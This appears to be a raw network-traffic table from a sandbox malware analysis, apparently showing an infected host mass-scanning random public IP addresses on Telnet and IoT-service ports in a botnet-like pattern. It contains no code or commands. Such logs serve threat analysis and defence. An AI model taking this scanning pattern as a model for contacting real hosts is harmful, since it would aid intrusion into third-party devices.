                                                                        Dec 6, 2024 00:36:55.757890940 CET75744496269.200.69.138192.168.2.23
                                                                        Dec 6, 2024 00:36:55.757900953 CET555548206209.39.207.150192.168.2.23
                                                                        Dec 6, 2024 00:36:55.757936954 CET804548853.254.96.192192.168.2.23
                                                                        Dec 6, 2024 00:36:55.758057117 CET8041216212.175.190.28192.168.2.23
                                                                        Dec 6, 2024 00:36:55.758066893 CET805077652.35.25.20192.168.2.23
                                                                        Dec 6, 2024 00:36:55.758075953 CET80805308663.90.139.102192.168.2.23
                                                                        Dec 6, 2024 00:36:55.758085012 CET5286947336114.134.116.214192.168.2.23
                                                                        Dec 6, 2024 00:36:55.758095980 CET80804113031.221.221.104192.168.2.23
                                                                        Dec 6, 2024 00:36:55.758162975 CET80427846.197.162.24192.168.2.23
                                                                        Dec 6, 2024 00:36:55.758172035 CET8048190150.49.139.129192.168.2.23
                                                                        Dec 6, 2024 00:36:55.758179903 CET8036662129.110.147.175192.168.2.23
                                                                        Dec 6, 2024 00:36:55.758250952 CET555536822184.220.87.241192.168.2.23
                                                                        Dec 6, 2024 00:36:55.758272886 CET808048714192.181.66.22192.168.2.23
                                                                        Dec 6, 2024 00:36:55.758308887 CET372153334695.201.182.127192.168.2.23
                                                                        Dec 6, 2024 00:36:55.758430958 CET5286955738177.124.131.210192.168.2.23
                                                                        Dec 6, 2024 00:36:55.758445978 CET757436670108.175.170.193192.168.2.23
                                                                        Dec 6, 2024 00:36:55.758465052 CET808048816103.159.239.63192.168.2.23
                                                                        Dec 6, 2024 00:36:55.758533955 CET808046456149.193.148.34192.168.2.23
                                                                        Dec 6, 2024 00:36:55.758542061 CET8155166206.213.118.4192.168.2.23
                                                                        Dec 6, 2024 00:36:55.758683920 CET84434272832.247.129.246192.168.2.23
                                                                        Dec 6, 2024 00:36:55.758692980 CET805254419.154.130.117192.168.2.23
                                                                        Dec 6, 2024 00:36:55.758714914 CET80805259277.237.7.131192.168.2.23
                                                                        Dec 6, 2024 00:36:55.758724928 CET808034596128.12.140.246192.168.2.23
                                                                        Dec 6, 2024 00:36:55.758733034 CET4915246434190.123.58.154192.168.2.23
                                                                        Dec 6, 2024 00:36:55.758760929 CET8038892142.115.135.32192.168.2.23
                                                                        Dec 6, 2024 00:36:55.758822918 CET844345762119.180.236.246192.168.2.23
                                                                        Dec 6, 2024 00:36:55.758832932 CET757451804159.189.182.100192.168.2.23
                                                                        Dec 6, 2024 00:36:55.759103060 CET528693531499.162.112.187192.168.2.23
                                                                        Dec 6, 2024 00:36:55.759150028 CET803513038.189.25.217192.168.2.23
                                                                        Dec 6, 2024 00:36:55.759164095 CET814564295.118.139.239192.168.2.23
                                                                        Dec 6, 2024 00:36:55.768237114 CET844353608194.167.150.102192.168.2.23
                                                                        Dec 6, 2024 00:36:55.768290997 CET555537904164.194.135.238192.168.2.23
                                                                        Dec 6, 2024 00:36:55.768301010 CET8036750214.127.3.37192.168.2.23
                                                                        Dec 6, 2024 00:36:55.768322945 CET80803954624.51.61.43192.168.2.23
                                                                        Dec 6, 2024 00:36:55.768332005 CET4915242858110.77.244.54192.168.2.23
                                                                        Dec 6, 2024 00:36:55.768404961 CET84435311471.82.199.131192.168.2.23
                                                                        Dec 6, 2024 00:36:55.768421888 CET4915247338156.177.99.179192.168.2.23
                                                                        Dec 6, 2024 00:36:55.770654917 CET8037236159.226.179.189192.168.2.23
                                                                        Dec 6, 2024 00:36:55.794133902 CET80804736657.233.61.98192.168.2.23
                                                                        Dec 6, 2024 00:36:55.807976961 CET491525925855.139.42.174192.168.2.23
                                                                        Dec 6, 2024 00:36:55.808023930 CET803287053.223.145.174192.168.2.23
                                                                        Dec 6, 2024 00:36:55.808033943 CET84435985827.14.33.79192.168.2.23
                                                                        Dec 6, 2024 00:36:55.808043003 CET3721550010185.35.83.146192.168.2.23
                                                                        Dec 6, 2024 00:36:55.864227057 CET84434144077.50.212.67192.168.2.23
                                                                        Dec 6, 2024 00:36:55.866905928 CET80804599283.191.83.234192.168.2.23
                                                                        Dec 6, 2024 00:36:55.866945982 CET808050074128.100.55.44192.168.2.23
                                                                        Dec 6, 2024 00:36:55.866955996 CET80804982270.136.186.81192.168.2.23
                                                                        Dec 6, 2024 00:36:55.867062092 CET55555953670.1.42.222192.168.2.23
                                                                        Dec 6, 2024 00:36:55.867129087 CET844351730196.21.246.20192.168.2.23
                                                                        Dec 6, 2024 00:36:55.867158890 CET80805913825.203.243.102192.168.2.23
                                                                        Dec 6, 2024 00:36:55.867202044 CET84435913446.79.121.4192.168.2.23
                                                                        Dec 6, 2024 00:36:55.867228985 CET808034434120.171.90.106192.168.2.23
                                                                        Dec 6, 2024 00:36:55.867238998 CET757454560108.8.51.27192.168.2.23
                                                                        Dec 6, 2024 00:36:55.867285967 CET75745419026.165.219.86192.168.2.23
                                                                        Dec 6, 2024 00:36:55.867388964 CET8042796210.76.1.253192.168.2.23
                                                                        Dec 6, 2024 00:36:55.867448092 CET804763059.127.6.12192.168.2.23
                                                                        Dec 6, 2024 00:36:55.867459059 CET372154693825.51.174.183192.168.2.23
                                                                        Dec 6, 2024 00:36:55.867474079 CET8153284153.14.52.155192.168.2.23
                                                                        Dec 6, 2024 00:36:55.867501020 CET80803292043.136.192.62192.168.2.23
                                                                        Dec 6, 2024 00:36:55.867640972 CET80805903068.104.71.243192.168.2.23
                                                                        Dec 6, 2024 00:36:55.867664099 CET491525041874.121.250.48192.168.2.23
                                                                        Dec 6, 2024 00:36:55.867686987 CET808037544172.226.49.225192.168.2.23
                                                                        Dec 6, 2024 00:36:55.867713928 CET808048828101.130.93.192192.168.2.23
                                                                        Dec 6, 2024 00:36:55.867854118 CET8143434198.110.152.177192.168.2.23
                                                                        Dec 6, 2024 00:36:55.867863894 CET8159392180.189.218.79192.168.2.23
                                                                        Dec 6, 2024 00:36:55.867872000 CET805974424.60.83.178192.168.2.23
                                                                        Dec 6, 2024 00:36:55.867882013 CET8044440179.184.84.34192.168.2.23
                                                                        Dec 6, 2024 00:36:55.867954969 CET805776473.90.183.63192.168.2.23
                                                                        Dec 6, 2024 00:36:55.868009090 CET80805187090.153.54.244192.168.2.23
                                                                        Dec 6, 2024 00:36:55.868017912 CET808043626214.111.203.47192.168.2.23
                                                                        Dec 6, 2024 00:36:55.868030071 CET84435048692.189.191.216192.168.2.23
                                                                        Dec 6, 2024 00:36:55.868048906 CET803769676.133.151.50192.168.2.23
                                                                        Dec 6, 2024 00:36:55.868259907 CET804351639.11.173.155192.168.2.23
                                                                        Dec 6, 2024 00:36:55.868272066 CET844354686168.166.161.25192.168.2.23
                                                                        Dec 6, 2024 00:36:55.868285894 CET844341678116.111.91.113192.168.2.23
                                                                        Dec 6, 2024 00:36:55.868294954 CET8039156151.36.87.52192.168.2.23
                                                                        Dec 6, 2024 00:36:55.868305922 CET80805509048.90.206.169192.168.2.23
                                                                        Dec 6, 2024 00:36:55.868320942 CET803385814.239.128.170192.168.2.23
                                                                        Dec 6, 2024 00:36:55.868355989 CET75745367267.237.240.84192.168.2.23
                                                                        Dec 6, 2024 00:36:55.868451118 CET8048966101.172.124.155192.168.2.23
                                                                        Dec 6, 2024 00:36:55.868464947 CET808047740101.147.63.141192.168.2.23
                                                                        Dec 6, 2024 00:36:55.868484020 CET55553410414.89.23.36192.168.2.23
                                                                        Dec 6, 2024 00:36:55.868504047 CET814590231.140.214.51192.168.2.23
                                                                        Dec 6, 2024 00:36:55.868544102 CET8040688219.63.223.16192.168.2.23
                                                                        Dec 6, 2024 00:36:55.868657112 CET4915253360153.240.186.210192.168.2.23
                                                                        Dec 6, 2024 00:36:55.868666887 CET804133473.18.143.204192.168.2.23
                                                                        Dec 6, 2024 00:36:55.868674994 CET84435205015.22.71.3192.168.2.23
                                                                        Dec 6, 2024 00:36:55.868696928 CET491525298232.160.241.63192.168.2.23
                                                                        Dec 6, 2024 00:36:55.868774891 CET8055498182.198.195.130192.168.2.23
                                                                        Dec 6, 2024 00:36:55.868840933 CET813781464.29.19.57192.168.2.23
                                                                        Dec 6, 2024 00:36:55.868875980 CET814744049.24.94.191192.168.2.23
                                                                        Dec 6, 2024 00:36:55.868890047 CET8048332197.204.137.58192.168.2.23
                                                                        Dec 6, 2024 00:36:55.868906021 CET55555430494.56.235.17192.168.2.23
                                                                        Dec 6, 2024 00:36:55.869143009 CET808046832138.154.6.217192.168.2.23
                                                                        Dec 6, 2024 00:36:55.869155884 CET84433469058.27.122.15192.168.2.23
                                                                        Dec 6, 2024 00:36:55.869172096 CET8053182158.133.3.184192.168.2.23
                                                                        Dec 6, 2024 00:36:55.869324923 CET8040988117.184.53.182192.168.2.23
                                                                        Dec 6, 2024 00:36:55.869391918 CET803389282.146.61.237192.168.2.23
                                                                        Dec 6, 2024 00:36:55.869489908 CET757447146112.185.80.51192.168.2.23
                                                                        Dec 6, 2024 00:36:55.869501114 CET844345700181.15.136.11192.168.2.23
                                                                        Dec 6, 2024 00:36:55.869615078 CET491525000277.121.98.247192.168.2.23
                                                                        Dec 6, 2024 00:36:55.869657040 CET757454840109.222.95.21192.168.2.23
                                                                        Dec 6, 2024 00:36:55.869771957 CET555549594199.23.101.88192.168.2.23
                                                                        Dec 6, 2024 00:36:55.869788885 CET805048673.177.193.220192.168.2.23
                                                                        Dec 6, 2024 00:36:55.869853973 CET5286952078191.245.227.83192.168.2.23
                                                                        Dec 6, 2024 00:36:55.869945049 CET4915244882181.245.251.146192.168.2.23
                                                                        Dec 6, 2024 00:36:55.869955063 CET8032856191.77.140.153192.168.2.23
                                                                        Dec 6, 2024 00:36:55.869975090 CET55554185498.125.56.208192.168.2.23
                                                                        Dec 6, 2024 00:36:55.870090008 CET8053304182.227.110.28192.168.2.23
                                                                        Dec 6, 2024 00:36:55.870100021 CET814873034.139.201.213192.168.2.23
                                                                        Dec 6, 2024 00:36:55.872708082 CET555532996101.15.65.84192.168.2.23
                                                                        Dec 6, 2024 00:36:55.872745037 CET84435808067.217.252.15192.168.2.23
                                                                        Dec 6, 2024 00:36:55.872754097 CET815120012.222.93.105192.168.2.23
                                                                        Dec 6, 2024 00:36:55.872776031 CET8056482133.9.23.21192.168.2.23
                                                                        Dec 6, 2024 00:36:55.872807980 CET55553917619.149.226.178192.168.2.23
                                                                        Dec 6, 2024 00:36:55.872939110 CET80804189613.194.80.189192.168.2.23
                                                                        Dec 6, 2024 00:36:55.872961044 CET3721560888109.25.203.105192.168.2.23
                                                                        Dec 6, 2024 00:36:55.873126984 CET5286953488202.88.157.165192.168.2.23
                                                                        Dec 6, 2024 00:36:55.873152971 CET8043486157.231.213.112192.168.2.23
                                                                        Dec 6, 2024 00:36:55.873162031 CET372155791292.101.144.171192.168.2.23
                                                                        Dec 6, 2024 00:36:55.873188019 CET80804499014.20.190.62192.168.2.23
                                                                        Dec 6, 2024 00:36:55.873326063 CET8039748205.190.110.250192.168.2.23
                                                                        Dec 6, 2024 00:36:55.873362064 CET80805174214.112.238.214192.168.2.23
                                                                        Dec 6, 2024 00:36:55.873384953 CET8152944156.239.151.122192.168.2.23
                                                                        Dec 6, 2024 00:36:55.873394966 CET805432424.168.121.6192.168.2.23
                                                                        Dec 6, 2024 00:36:55.873414993 CET8049894112.194.38.63192.168.2.23
                                                                        Dec 6, 2024 00:36:55.873425007 CET80803286011.48.182.3192.168.2.23
                                                                        Dec 6, 2024 00:36:55.873483896 CET8147612193.101.206.136192.168.2.23
                                                                        Dec 6, 2024 00:36:55.873564959 CET8049890152.96.212.208192.168.2.23
                                                                        Dec 6, 2024 00:36:55.873660088 CET8051940144.80.221.222192.168.2.23
                                                                        Dec 6, 2024 00:36:55.873670101 CET55553497034.86.117.21192.168.2.23
                                                                        Dec 6, 2024 00:36:55.873678923 CET80803385018.43.39.195192.168.2.23
                                                                        Dec 6, 2024 00:36:55.873795033 CET372154472881.72.56.112192.168.2.23
                                                                        Dec 6, 2024 00:36:55.873805046 CET80805365448.137.212.42192.168.2.23
                                                                        Dec 6, 2024 00:36:55.873812914 CET844351426218.190.128.190192.168.2.23
                                                                        Dec 6, 2024 00:36:55.873888016 CET4915254388177.141.44.231192.168.2.23
                                                                        Dec 6, 2024 00:36:55.873965979 CET8055626144.176.109.6192.168.2.23
                                                                        Dec 6, 2024 00:36:55.873975992 CET808055064107.150.100.17192.168.2.23
                                                                        Dec 6, 2024 00:36:55.873984098 CET8051362210.92.63.90192.168.2.23
                                                                        Dec 6, 2024 00:36:55.874003887 CET8050600125.230.87.138192.168.2.23
                                                                        Dec 6, 2024 00:36:55.874013901 CET5286933120106.23.130.140192.168.2.23
                                                                        Dec 6, 2024 00:36:55.874133110 CET757437312186.93.85.188192.168.2.23
                                                                        Dec 6, 2024 00:36:55.874144077 CET808053778162.60.224.62192.168.2.23
                                                                        Dec 6, 2024 00:36:55.874160051 CET844344998200.210.196.178192.168.2.23
                                                                        Dec 6, 2024 00:36:55.874214888 CET84435968850.55.178.34192.168.2.23
                                                                        Dec 6, 2024 00:36:55.874224901 CET555547284213.33.239.153192.168.2.23
                                                                        Dec 6, 2024 00:36:55.874388933 CET80805515878.253.75.148192.168.2.23
                                                                        Dec 6, 2024 00:36:55.874398947 CET814142033.20.233.190192.168.2.23
                                                                        Dec 6, 2024 00:36:55.874407053 CET3721551114118.197.10.107192.168.2.23
                                                                        Dec 6, 2024 00:36:55.874417067 CET808043134142.67.238.233192.168.2.23
                                                                        Dec 6, 2024 00:36:55.874424934 CET803291615.252.209.178192.168.2.23
                                                                        Dec 6, 2024 00:36:55.874445915 CET844336494118.85.253.235192.168.2.23
                                                                        Dec 6, 2024 00:36:55.874540091 CET4915240718178.72.204.4192.168.2.23
                                                                        Dec 6, 2024 00:36:55.874571085 CET37215478365.174.228.198192.168.2.23
                                                                        Dec 6, 2024 00:36:55.874635935 CET491525807896.81.159.236192.168.2.23
                                                                        Dec 6, 2024 00:36:55.874645948 CET80806002254.254.1.112192.168.2.23
                                                                        Dec 6, 2024 00:36:55.874654055 CET805022881.210.236.238192.168.2.23
                                                                        Dec 6, 2024 00:36:55.874746084 CET3721550222171.88.32.116192.168.2.23
                                                                        Dec 6, 2024 00:36:55.874766111 CET491523740858.25.214.119192.168.2.23
                                                                        Dec 6, 2024 00:36:55.874775887 CET805388261.221.193.115192.168.2.23
                                                                        Dec 6, 2024 00:36:55.874809980 CET808041726212.232.123.121192.168.2.23
                                                                        Dec 6, 2024 00:36:55.874898911 CET3721541302137.202.127.253192.168.2.23
                                                                        Dec 6, 2024 00:36:55.874911070 CET5286949044173.224.150.117192.168.2.23
                                                                        Dec 6, 2024 00:36:55.874974966 CET805804676.231.140.115192.168.2.23
                                                                        Dec 6, 2024 00:36:55.874984980 CET8050262202.51.201.37192.168.2.23
                                                                        Dec 6, 2024 00:36:55.875063896 CET808033202153.157.254.30192.168.2.23
                                                                        Dec 6, 2024 00:36:55.875082970 CET55555902025.40.34.74192.168.2.23
                                                                        Dec 6, 2024 00:36:55.875098944 CET75744575819.251.187.157192.168.2.23
                                                                        Dec 6, 2024 00:36:55.875165939 CET75744492275.14.247.30192.168.2.23
                                                                        Dec 6, 2024 00:36:55.875188112 CET81601221.228.137.84192.168.2.23
                                                                        Dec 6, 2024 00:36:55.875271082 CET528693446841.43.78.104192.168.2.23
                                                                        Dec 6, 2024 00:36:55.875344992 CET3721548102144.147.141.226192.168.2.23
                                                                        Dec 6, 2024 00:36:55.875355005 CET808044338189.229.175.122192.168.2.23
                                                                        Dec 6, 2024 00:36:55.875363111 CET8055692182.149.46.3192.168.2.23
                                                                        Dec 6, 2024 00:36:55.875379086 CET808034086215.189.147.100192.168.2.23
                                                                        Dec 6, 2024 00:36:55.875539064 CET757459254130.123.72.225192.168.2.23
                                                                        Dec 6, 2024 00:36:55.875549078 CET80804935471.164.37.212192.168.2.23
                                                                        Dec 6, 2024 00:36:55.875557899 CET8134102139.196.105.183192.168.2.23
                                                                        Dec 6, 2024 00:36:55.875566959 CET808036326220.74.129.133192.168.2.23
                                                                        Dec 6, 2024 00:36:55.875581980 CET8060306112.166.114.199192.168.2.23
                                                                        Dec 6, 2024 00:36:55.875624895 CET803787670.159.0.172192.168.2.23
                                                                        Dec 6, 2024 00:36:55.875646114 CET3721532814197.72.9.100192.168.2.23
                                                                        Dec 6, 2024 00:36:55.875689030 CET804177263.164.211.208192.168.2.23
                                                                        Dec 6, 2024 00:36:55.875797987 CET372155643898.179.93.63192.168.2.23
                                                                        Dec 6, 2024 00:36:55.875897884 CET808057396132.109.208.103192.168.2.23
                                                                        Dec 6, 2024 00:36:55.875909090 CET808039304181.25.123.235192.168.2.23
                                                                        Dec 6, 2024 00:36:55.875916958 CET372154834079.132.196.216192.168.2.23
                                                                        Dec 6, 2024 00:36:55.875925064 CET844347496175.207.134.61192.168.2.23
                                                                        Dec 6, 2024 00:36:55.875978947 CET808054282153.94.23.173192.168.2.23
                                                                        Dec 6, 2024 00:36:55.876017094 CET80805552477.17.189.40192.168.2.23
                                                                        Dec 6, 2024 00:36:55.876025915 CET815325691.100.12.254192.168.2.23
                                                                        Dec 6, 2024 00:36:55.876050949 CET55554943441.161.214.192192.168.2.23
                                                                        Dec 6, 2024 00:36:57.008505106 CET803389282.146.61.237192.168.2.23
                                                                        Dec 6, 2024 00:36:57.008618116 CET3389280192.168.2.2382.146.61.237
                                                                        Dec 6, 2024 00:36:57.031001091 CET3389280192.168.2.2382.146.61.237
                                                                        Dec 6, 2024 00:36:57.043989897 CET42836443192.168.2.2391.189.91.43
                                                                        Dec 6, 2024 00:36:57.141673088 CET4674849152192.168.2.2366.99.16.40
                                                                        Dec 6, 2024 00:36:57.153496981 CET803389282.146.61.237192.168.2.23
                                                                        Dec 6, 2024 00:36:57.153547049 CET3389280192.168.2.2382.146.61.237
                                                                        Dec 6, 2024 00:36:57.247458935 CET804763059.127.6.12192.168.2.23
                                                                        Dec 6, 2024 00:36:57.247633934 CET4763080192.168.2.2359.127.6.12
                                                                        Dec 6, 2024 00:36:57.247694016 CET804763059.127.6.12192.168.2.23
                                                                        Dec 6, 2024 00:36:57.258158922 CET491524674866.99.16.40192.168.2.23
                                                                        Dec 6, 2024 00:36:57.258306980 CET4674849152192.168.2.2366.99.16.40
                                                                        Dec 6, 2024 00:36:57.288023949 CET4763080192.168.2.2359.127.6.12
                                                                        Dec 6, 2024 00:36:57.343997955 CET4763080192.168.2.2359.127.6.12
                                                                        Dec 6, 2024 00:36:57.452759981 CET332708443192.168.2.2373.240.143.34
                                                                        Dec 6, 2024 00:36:57.463337898 CET804763059.127.6.12192.168.2.23
                                                                        Dec 6, 2024 00:36:57.468493938 CET4674849152192.168.2.2366.99.16.40
                                                                        Dec 6, 2024 00:36:57.571857929 CET84433327073.240.143.34192.168.2.23
                                                                        Dec 6, 2024 00:36:57.572130919 CET332708443192.168.2.2373.240.143.34
                                                                        Dec 6, 2024 00:36:57.590872049 CET491524674866.99.16.40192.168.2.23
                                                                        Dec 6, 2024 00:36:57.603766918 CET80804218424.111.109.113192.168.2.23
                                                                        Dec 6, 2024 00:36:57.603941917 CET421848080192.168.2.2324.111.109.113
                                                                        Dec 6, 2024 00:36:57.778801918 CET332708443192.168.2.2373.240.143.34
                                                                        Dec 6, 2024 00:36:57.828114986 CET55555115684.240.86.160192.168.2.23
                                                                        Dec 6, 2024 00:36:57.831971884 CET511565555192.168.2.2384.240.86.160
                                                                        Dec 6, 2024 00:36:57.876526117 CET808037544172.226.49.225192.168.2.23
                                                                        Dec 6, 2024 00:36:57.879893064 CET375448080192.168.2.23172.226.49.225
                                                                        Dec 6, 2024 00:36:57.902251959 CET84433327073.240.143.34192.168.2.23
                                                                        Dec 6, 2024 00:36:57.979291916 CET555547284213.33.239.153192.168.2.23
                                                                        Dec 6, 2024 00:36:57.979867935 CET472845555192.168.2.23213.33.239.153
                                                                        Dec 6, 2024 00:36:58.054296970 CET5286947336114.134.116.214192.168.2.23
                                                                        Dec 6, 2024 00:36:58.055850029 CET4733652869192.168.2.23114.134.116.214
                                                                        Dec 6, 2024 00:36:58.172743082 CET844347496175.207.134.61192.168.2.23
                                                                        Dec 6, 2024 00:36:58.175839901 CET474968443192.168.2.23175.207.134.61
                                                                        Dec 6, 2024 00:36:58.177027941 CET55553410414.89.23.36192.168.2.23
                                                                        Dec 6, 2024 00:36:58.179836988 CET341045555192.168.2.2314.89.23.36
                                                                        Dec 6, 2024 00:36:58.192441940 CET8060306112.166.114.199192.168.2.23
                                                                        Dec 6, 2024 00:36:58.194650888 CET81601221.228.137.84192.168.2.23
                                                                        Dec 6, 2024 00:36:58.195822954 CET6012281192.168.2.231.228.137.84
                                                                        Dec 6, 2024 00:36:58.195828915 CET6030680192.168.2.23112.166.114.199
                                                                        Dec 6, 2024 00:36:58.209846973 CET808036326220.74.129.133192.168.2.23
                                                                        Dec 6, 2024 00:36:58.211815119 CET363268080192.168.2.23220.74.129.133
                                                                        Dec 6, 2024 00:36:58.215533972 CET757447146112.185.80.51192.168.2.23
                                                                        Dec 6, 2024 00:36:58.215826035 CET471467574192.168.2.23112.185.80.51
                                                                        Dec 6, 2024 00:36:58.579804897 CET4251680192.168.2.23109.202.202.202
                                                                        Dec 6, 2024 00:36:58.618947983 CET4036681192.168.2.2337.118.61.47
                                                                        Dec 6, 2024 00:36:58.641272068 CET4876280192.168.2.23138.35.154.46
                                                                        Dec 6, 2024 00:36:58.738904953 CET814036637.118.61.47192.168.2.23
                                                                        Dec 6, 2024 00:36:58.738991976 CET4036681192.168.2.2337.118.61.47
                                                                        Dec 6, 2024 00:36:58.760723114 CET8048762138.35.154.46192.168.2.23
                                                                        Dec 6, 2024 00:36:58.760780096 CET4876280192.168.2.23138.35.154.46
                                                                        Dec 6, 2024 00:36:58.934446096 CET4036681192.168.2.2337.118.61.47
                                                                        Dec 6, 2024 00:36:58.955883980 CET4876280192.168.2.23138.35.154.46
                                                                        Dec 6, 2024 00:36:59.060627937 CET814036637.118.61.47192.168.2.23
                                                                        Dec 6, 2024 00:36:59.072776079 CET8048762138.35.154.46192.168.2.23
                                                                        Dec 6, 2024 00:37:04.294624090 CET419731023192.168.2.23181.69.108.246
                                                                        Dec 6, 2024 00:37:04.294692993 CET4197323192.168.2.2323.11.44.230
                                                                        Dec 6, 2024 00:37:04.294701099 CET4197323192.168.2.23210.63.192.243
                                                                        Dec 6, 2024 00:37:04.294720888 CET4197323192.168.2.2345.162.46.130
                                                                        Dec 6, 2024 00:37:04.294720888 CET4197323192.168.2.23205.253.16.96
                                                                        Dec 6, 2024 00:37:04.294742107 CET4197323192.168.2.23212.252.159.20
                                                                        Dec 6, 2024 00:37:04.294756889 CET4197323192.168.2.2340.17.181.231
                                                                        Dec 6, 2024 00:37:04.294765949 CET4197323192.168.2.23173.136.2.215
                                                                        Dec 6, 2024 00:37:04.294764996 CET4197323192.168.2.23185.89.66.87
                                                                        Dec 6, 2024 00:37:04.294775963 CET4197323192.168.2.2370.169.138.45
                                                                        Dec 6, 2024 00:37:04.294779062 CET419732323192.168.2.2346.225.80.103
                                                                        Dec 6, 2024 00:37:04.294797897 CET4197323192.168.2.23204.46.166.245
                                                                        Dec 6, 2024 00:37:04.294802904 CET4197323192.168.2.23154.18.241.234
                                                                        Dec 6, 2024 00:37:04.294811010 CET4197323192.168.2.2345.163.247.116
                                                                        Dec 6, 2024 00:37:04.294823885 CET4197323192.168.2.23103.90.69.101
                                                                        Dec 6, 2024 00:37:04.294837952 CET4197323192.168.2.2357.37.47.90
                                                                        Dec 6, 2024 00:37:04.294841051 CET4197323192.168.2.23151.148.78.149
                                                                        Dec 6, 2024 00:37:04.294845104 CET4197323192.168.2.23209.130.127.153
                                                                        Dec 6, 2024 00:37:04.294859886 CET4197323192.168.2.23110.139.97.138
                                                                        Dec 6, 2024 00:37:04.294872046 CET4197323192.168.2.23125.94.78.10
                                                                        Dec 6, 2024 00:37:04.294887066 CET419732323192.168.2.2379.173.177.69
                                                                        Dec 6, 2024 00:37:04.294887066 CET4197323192.168.2.2398.242.48.207
                                                                        Dec 6, 2024 00:37:04.294903040 CET4197323192.168.2.2334.6.47.75
                                                                        Dec 6, 2024 00:37:04.294908047 CET4197323192.168.2.2371.137.6.48
                                                                        Dec 6, 2024 00:37:04.294923067 CET4197323192.168.2.2363.151.178.96
                                                                        Dec 6, 2024 00:37:04.294924974 CET4197323192.168.2.23220.172.63.114
                                                                        Dec 6, 2024 00:37:04.294928074 CET4197323192.168.2.2382.188.91.41
                                                                        Dec 6, 2024 00:37:04.294943094 CET4197323192.168.2.23209.71.201.106
                                                                        Dec 6, 2024 00:37:04.294945955 CET4197323192.168.2.232.7.198.101
                                                                        Dec 6, 2024 00:37:04.294960022 CET4197323192.168.2.2378.10.102.90
                                                                        Dec 6, 2024 00:37:04.294960976 CET419732323192.168.2.2386.155.137.194
                                                                        Dec 6, 2024 00:37:04.294992924 CET4197323192.168.2.23140.235.222.223
                                                                        Dec 6, 2024 00:37:04.294994116 CET4197323192.168.2.23145.174.183.126
                                                                        Dec 6, 2024 00:37:04.295015097 CET4197323192.168.2.23108.22.158.140
                                                                        Dec 6, 2024 00:37:04.295016050 CET4197323192.168.2.2319.75.47.225
                                                                        Dec 6, 2024 00:37:04.295020103 CET4197323192.168.2.23217.11.150.181
                                                                        Dec 6, 2024 00:37:04.295038939 CET4197323192.168.2.2368.31.102.175
                                                                        Dec 6, 2024 00:37:04.295042038 CET4197323192.168.2.23103.52.66.40
                                                                        Dec 6, 2024 00:37:04.295043945 CET4197323192.168.2.23196.218.227.138
                                                                        Dec 6, 2024 00:37:04.295056105 CET4197323192.168.2.23124.178.178.153
                                                                        Dec 6, 2024 00:37:04.295064926 CET419732323192.168.2.23125.40.65.165
                                                                        Dec 6, 2024 00:37:04.295079947 CET4197323192.168.2.2382.210.121.89
                                                                        Dec 6, 2024 00:37:04.295080900 CET4197323192.168.2.2382.228.10.195
                                                                        Dec 6, 2024 00:37:04.295090914 CET4197323192.168.2.23136.46.241.228
                                                                        Dec 6, 2024 00:37:04.295109987 CET4197323192.168.2.23161.101.173.141
                                                                        Dec 6, 2024 00:37:04.295114040 CET4197323192.168.2.2368.190.176.59
                                                                        Dec 6, 2024 00:37:04.295128107 CET4197323192.168.2.23185.250.160.17
                                                                        Dec 6, 2024 00:37:04.295136929 CET4197323192.168.2.23182.102.180.60
                                                                        Dec 6, 2024 00:37:04.295155048 CET4197323192.168.2.23154.106.23.130
                                                                        Dec 6, 2024 00:37:04.295160055 CET4197323192.168.2.2358.156.9.17
                                                                        Dec 6, 2024 00:37:04.295171022 CET419732323192.168.2.2396.235.67.124
                                                                        Dec 6, 2024 00:37:04.295182943 CET4197323192.168.2.2360.63.67.216
                                                                        Dec 6, 2024 00:37:04.295185089 CET4197323192.168.2.2376.47.193.8
                                                                        Dec 6, 2024 00:37:04.295205116 CET4197323192.168.2.23187.140.112.40
                                                                        Dec 6, 2024 00:37:04.295207024 CET4197323192.168.2.2396.91.144.148
                                                                        Dec 6, 2024 00:37:04.295212984 CET4197323192.168.2.2348.70.117.66
                                                                        Dec 6, 2024 00:37:04.295228958 CET4197323192.168.2.23121.217.110.88
                                                                        Dec 6, 2024 00:37:04.295232058 CET4197323192.168.2.23113.124.80.62
                                                                        Dec 6, 2024 00:37:04.295252085 CET4197323192.168.2.2397.5.60.192
                                                                        Dec 6, 2024 00:37:04.295253038 CET4197323192.168.2.23165.190.221.76
                                                                        Dec 6, 2024 00:37:04.295270920 CET419732323192.168.2.23223.10.72.22
                                                                        Dec 6, 2024 00:37:04.295286894 CET4197323192.168.2.2313.133.83.86
                                                                        Dec 6, 2024 00:37:04.295289040 CET4197323192.168.2.2342.148.138.210
                                                                        Dec 6, 2024 00:37:04.295309067 CET4197323192.168.2.23167.97.124.76
                                                                        Dec 6, 2024 00:37:04.295326948 CET4197323192.168.2.23154.170.230.242
                                                                        Dec 6, 2024 00:37:04.295326948 CET4197323192.168.2.23164.138.192.93
                                                                        Dec 6, 2024 00:37:04.295341015 CET4197323192.168.2.2327.159.149.172
                                                                        Dec 6, 2024 00:37:04.295355082 CET4197323192.168.2.23157.137.146.189
                                                                        Dec 6, 2024 00:37:04.295375109 CET4197323192.168.2.23147.176.173.211
                                                                        Dec 6, 2024 00:37:04.295375109 CET4197323192.168.2.23209.255.0.253
                                                                        Dec 6, 2024 00:37:04.295397043 CET419732323192.168.2.2354.134.139.3
                                                                        Dec 6, 2024 00:37:04.295403957 CET4197323192.168.2.2340.226.195.151
                                                                        Dec 6, 2024 00:37:04.295411110 CET4197323192.168.2.23222.24.226.145
                                                                        Dec 6, 2024 00:37:04.295423985 CET4197323192.168.2.2396.66.24.79
                                                                        Dec 6, 2024 00:37:04.295428991 CET4197323192.168.2.23102.130.32.60
                                                                        Dec 6, 2024 00:37:04.295444012 CET4197323192.168.2.23164.249.98.103
                                                                        Dec 6, 2024 00:37:04.295458078 CET4197323192.168.2.23122.9.169.120
                                                                        Dec 6, 2024 00:37:04.295470953 CET4197323192.168.2.23207.82.121.152
                                                                        Dec 6, 2024 00:37:04.295475960 CET4197323192.168.2.2318.110.245.21
                                                                        Dec 6, 2024 00:37:04.295485973 CET4197323192.168.2.2383.157.195.180
                                                                        Dec 6, 2024 00:37:04.295494080 CET419732323192.168.2.23184.229.170.8
                                                                        Dec 6, 2024 00:37:04.295507908 CET4197323192.168.2.23219.211.57.45
                                                                        Dec 6, 2024 00:37:04.295510054 CET4197323192.168.2.2337.27.14.72
                                                                        Dec 6, 2024 00:37:04.295521021 CET4197323192.168.2.23160.65.201.233
                                                                        Dec 6, 2024 00:37:04.295531034 CET4197323192.168.2.2365.32.165.242
                                                                        Dec 6, 2024 00:37:04.295531988 CET4197323192.168.2.23190.16.1.22
